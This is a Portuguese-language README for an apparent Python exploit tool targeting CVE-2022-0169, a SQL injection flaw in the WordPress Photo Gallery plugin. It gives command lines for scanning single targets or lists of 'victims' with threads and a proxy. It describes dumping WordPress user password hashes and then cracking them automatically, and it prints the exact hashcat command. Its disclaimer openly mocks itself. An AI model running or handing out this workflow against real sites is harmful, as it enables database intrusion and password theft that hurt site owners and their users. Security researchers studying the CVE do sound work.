
CVE-2022-0169 - PoC de SQLi para WordPress Photo Gallery
Este é um proof-of-concept (PoC) simples em Python para CVE-2022-0169, uma vulnerabilidade de injeção de SQL no plugin WordPress Photo Gallery.
admin-ajax.phpwp_usersEsta ferramenta é apenas para fins educacionais. Use com responsabilidade! Como se você fosse dar ouvidos a isso.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
Exemplo:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
Requisitos
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/Quando hashes são encontrados, você será perguntado:
Crack the hashes with hashcat now? [Y/N]:
Se você pressionar Y, o hashcat será executado automaticamente usando a wordlist selecionada.
results/ para dumps e hashes.hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
Esta ferramenta é apenas para testes educacionais e autorizados. Você é o único responsável pelo uso que fizer dela. Sempre obtenha permissão antes de escanear ou explorar qualquer sistema.
Continue cyberpunk.
— X3RX3S
| Option | Description |
|---|
-u | URL do alvo único |
-f | Arquivo com lista de alvos |
-p | Proxy (ex.: http://127.0.0.1:8080) |
-t | Número de threads (padrão: 5) |
-w | Escolha a wordlist para o hashcat (padrão: rockyou.txt) Certifique-se de que o rockyou.txt está descompactado! |